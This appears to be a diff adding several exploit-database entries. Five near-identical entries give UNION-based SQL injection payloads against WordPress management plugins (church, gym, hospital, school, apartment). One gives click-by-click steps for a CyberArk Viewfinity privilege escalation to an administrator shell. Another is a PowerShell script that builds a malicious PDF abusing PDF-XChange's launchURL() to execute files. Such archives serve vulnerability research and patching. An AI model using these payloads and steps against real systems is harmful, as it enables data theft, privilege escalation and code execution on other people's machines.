+# Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://mojoomla.com/
+# Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251
+# Demo: http://mobilewebs.net/mojoomla/extend/wordpress/church/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an student members to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/?church-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
+# 
+# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42801.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: WPGYM - Wordpress Gym Management System  - SQL Injection
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://mojoomla.com/
+# Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964
+# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an student members to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
+# 
+# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42802.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Hospital Management System for Wordpress - SQL Injection
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://mojoomla.com/
+# Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634
+# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/hospital/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an student members to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
+# 
+# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42804.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: School Management System for Wordpress  - SQL Injection
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://mojoomla.com/
+# Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032
+# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an student members to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
+# 
+# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42805.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: WPAMS - Apartment Management System for wordpress  - SQL Injection
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://mojoomla.com/
+# Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837
+# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/apartment/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an student members to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/?apartment-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
+# 
+# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
+# 
+# Etc..
+# # # # #

platforms/windows/local/42319.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Privilege Escalation via CyberArk Viewfinity <= 5.5 (5.5.10.95)
+# Date: Found June 2017
+# Vendor Homepage: https://www.cyberark.com/ 
+# Version: Viewfinity version 5.5 (5.5.10.95)
+# Exploit Author: Eric Guillen aka geoda
+# Contact: https://twitter.com/ericsguillen
+# Website: https://geodasecurity.blogspot.com/
+# Tested on: Windows 7 and Windows 10
+# CVE: CVE-2017-11197
+# Category: Privilege Escalation
+
+1. Description
+
+Viewfinity allows the business to "effectively minimize local administrator privileges and control applications on endpoints and servers"
+
+This vulnerability allows a low privilege user to escalate to an administrative user via a bug within the Viewfinity "add printer" option.
+
+2. Proof of Concept
+
+First, verify you are a low privilege user by running the command "net session" in a CMD prompt. Net session displays information about all sessions with the local computer. The user will get Access is denied if they do not have Administrative privileges. 
+
+1. On the system tray, right click on Viewfinity and "Open Viewfinity Control Panel..."
+2. Click "Add Printer"
+3. Click "Add a network, wireless or Bluetooth printer"
+4. Click "The printer that I want isn't listed"
+5. Click "Select a shared printer by name"
+6. Click the "Browse..." icon
+7. Directly in the browser window, search for "C:\windows\system32\cmd.exe" and press <Enter>
+8. This will spawn a new CMD prompt. Verify you are now Administrator by typing in "net session"
+
+3. Solution
+
+Vendor has been notified of this vulnerability and has been addressed in the agent v6.1.1.220. Although untested, this vulnerability could be present prior to v6.1.1.220

platforms/windows/local/42537.txt

@@ -0,0 +1,81 @@
+# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
+# Date: 21-08-2017
+# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
+# Exploit Author: Daniele Votta
+# Contact: vottadaniele@gmail.com
+# Website: https://www.linkedin.com/in/vottadaniele/
+# CVE: 2017-13056
+
+# Category: PDF Reader RCE
+ 
+1. Description
+
+This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer.
+The launchURL() function allows an attacker to execute local files on the file
+system and bypass the security dialog.
+
+2. Proof of Concept (Generate evil PDF that start calc.exe) 
+Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
+Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
+Step 3: Open the generated PDF with Nitro Pro PDF Reader
+ 
+3. PDF Generation:
+
+function New-PDFJS {
+
+    
+
+    # Use the desidered params
+
+     [CmdletBinding()]
+  
+    Param (
+        
+    	[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
+   
+	[string]$msg = "Hello PDF",
+ 
+        [string]$filename = "C:\Users\User\Desktop\calc.pdf"
+  
+    )
+
+    
+
+    # Use the PDFSharp-WPF.dll library path
+
+    Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll
+
+    $doc = New-Object PdfSharp.Pdf.PdfDocument
+    $doc.Info.Title = $msg
+    $doc.info.Creator = "AnonymousUser"
+    $page = $doc.AddPage()
+
+    $graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
+    $font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
+    $box  = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
+    $graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)
+
+    $dictjs = New-Object PdfSharp.Pdf.PdfDictionary
+    $dictjs.Elements["/S"]  = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
+    $dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
+   
+    $doc.Internals.AddObject($dictjs)
+
+    $dict = New-Object PdfSharp.Pdf.PdfDictionary
+    $pdfarray = New-Object PdfSharp.Pdf.PdfArray
+    $embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")
+
+    $dict.Elements["/Names"] = $pdfarray
+    $pdfarray.Elements.Add($embeddedstring)
+    $pdfarray.Elements.Add($dictjs.Reference)
+    $doc.Internals.AddObject($dict)
+
+    $dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
+    $dictgroup.Elements["/JavaScript"] = $dict.Reference
+    $doc.Internals.Catalog.Elements["/Names"] = $dictgroup
+
+    $doc.Save($filename)
+}
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42537.zip